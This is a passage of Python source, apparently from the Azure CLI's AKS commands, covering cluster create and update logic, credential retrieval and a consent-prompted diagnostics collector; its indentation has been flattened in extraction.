enable_managed_identity = False
if not enable_managed_identity:
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
from knack.prompting import prompt_y_n
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(
outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper,
aci_subnet_name,
vnet_subnet_id,
enable_secret_rotation
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise CLIError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError(
'"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
raise CLIError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
'kubeletidentity': ManagedClusterPropertiesIdentityProfileValue(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(cmd.cli_ctx, cluster_identity_object_id, assign_kubelet_identity)
pod_identity_profile = None
if enable_pod_identity:
if not enable_managed_identity:
raise CLIError(
'--enable-pod-identity can only be specified when --enable-managed-identity is specified')
pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
_ensure_pod_identity_kubenet_consent(
network_profile, pod_identity_profile, enable_pod_identity_with_kubenet)
enable_rbac = True
if disable_rbac:
enable_rbac = False
auto_upgrade_profile = None
if auto_upgrade_channel is not None:
auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(
upgrade_channel=auto_upgrade_channel)
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile,
auto_upgrade_profile=auto_upgrade_profile,
pod_identity_profile=pod_identity_profile,
identity_profile=identity_profile,
disable_local_accounts=bool(disable_local_accounts))
if node_resource_group:
mc.node_resource_group = node_resource_group
use_custom_private_dns_zone = False
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError(
"Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if private_dns_zone:
if not enable_private_cluster:
raise CLIError(
"Invalid private dns zone for public cluster. It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM and private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_NONE:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise CLIError(private_dns_zone +
" is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise CLIError(
"--fqdn-subdomain should only be used for private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
disable_local_accounts=False,
enable_local_accounts=False,
yes=False,
tags=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not no_uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity and \
not enable_secret_rotation and \
not disable_secret_rotation and \
not tags and \
not windows_admin_password and \
not enable_local_accounts and \
not disable_local_accounts:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--no-uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel" or '
'"--enable-secret-rotation" or '
'"--disable-secret-rotation" or '
'"--tags" or '
'"--windows-admin-password" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac" or '
'"--enable-local-accounts" or '
'"--disable-local-accounts"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if disable_local_accounts and enable_local_accounts:
raise CLIError('Cannot specify --disable-local-accounts and --enable-local-accounts '
'at the same time.')
if disable_local_accounts:
instance.disable_local_accounts = True
if enable_local_accounts:
instance.disable_local_accounts = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError(
'Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise CLIError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
if not _is_pod_identity_addon_enabled(instance):
# we only rebuild the pod identity profile if it's disabled before
_update_addon_pod_identity(
instance, enable=True,
allow_kubenet_consent=enable_pod_identity_with_kubenet,
)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
azure_keyvault_secrets_provider_addon_profile = None
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
azure_keyvault_secrets_provider_addon_profile = instance.addon_profiles.get(CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, None)
azure_keyvault_secrets_provider_enabled = CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME].enabled
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled
if enable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--enable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--disable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if tags:
instance.tags = tags
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
headers = get_aks_custom_headers(aks_custom_headers)
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
